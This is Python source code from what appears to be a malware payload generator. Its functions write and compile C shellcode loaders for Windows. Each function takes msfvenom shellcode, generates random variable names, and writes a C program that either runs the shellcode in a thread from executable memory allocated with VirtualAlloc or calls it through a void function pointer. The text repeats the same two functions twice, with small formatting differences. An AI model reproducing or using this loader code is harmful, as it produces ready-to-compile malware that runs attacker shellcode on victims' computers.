def cVirtualAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open('payload.c', 'w') PayloadFile.write('#include <windows.h>\n') PayloadFile.write('#include <stdio.h>\n') PayloadFile.write('#include <string.h>\n') PayloadFile.write('int main()\n') PayloadFile.write('{\n') PayloadFile.write(' LPVOID lpvAddr;\n') PayloadFile.write(' HANDLE hHand;\n') PayloadFile.write(' DWORD dwWaitResult;\n') PayloadFile.write(' DWORD threadID;\n\n') PayloadFile.write('unsigned char buff[] = \n') PayloadFile.write('\"' + Shellcode + '\";\n\n') PayloadFile.write( 'lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n') PayloadFile.write('RtlMoveMemory(lpvAddr,buff, strlen(buff));\n') PayloadFile.write( 'hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n') PayloadFile.write('dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n') PayloadFile.write('return 0;\n') PayloadFile.write('}') PayloadFile.close() # Compile our C code csupport.compilemingw()
def cVirtualAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open("payload.c", "w") PayloadFile.write("#include <windows.h>\n") PayloadFile.write("#include <stdio.h>\n") PayloadFile.write("#include <string.h>\n") PayloadFile.write("int main()\n") PayloadFile.write("{\n") PayloadFile.write(" LPVOID lpvAddr;\n") PayloadFile.write(" HANDLE hHand;\n") PayloadFile.write(" DWORD dwWaitResult;\n") PayloadFile.write(" DWORD threadID;\n\n") PayloadFile.write("unsigned char buff[] = \n") PayloadFile.write('"' + Shellcode + '";\n\n') PayloadFile.write("lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n") PayloadFile.write("RtlMoveMemory(lpvAddr,buff, strlen(buff));\n") PayloadFile.write("hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n") PayloadFile.write("dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n") PayloadFile.write("return 0;\n") PayloadFile.write("}") PayloadFile.close() # Compile our C code csupport.compilemingw()
def cVoidPointer(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open('payload.c', 'w') PayloadFile.write('unsigned char payload[]=\n') PayloadFile.write('\"' + Shellcode + '\";\n') PayloadFile.write('int main(void) { ((void (*)())payload)();}') PayloadFile.close() # Compile our C code csupport.compilemingw()
def cVoidPointer (): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open('payload.c', 'w') PayloadFile.write('unsigned char payload[]=\n') PayloadFile.write('\"' + Shellcode + '\";\n') PayloadFile.write('int main(void) { ((void (*)())payload)();}') PayloadFile.close() # Compile our C code csupport.compilemingw()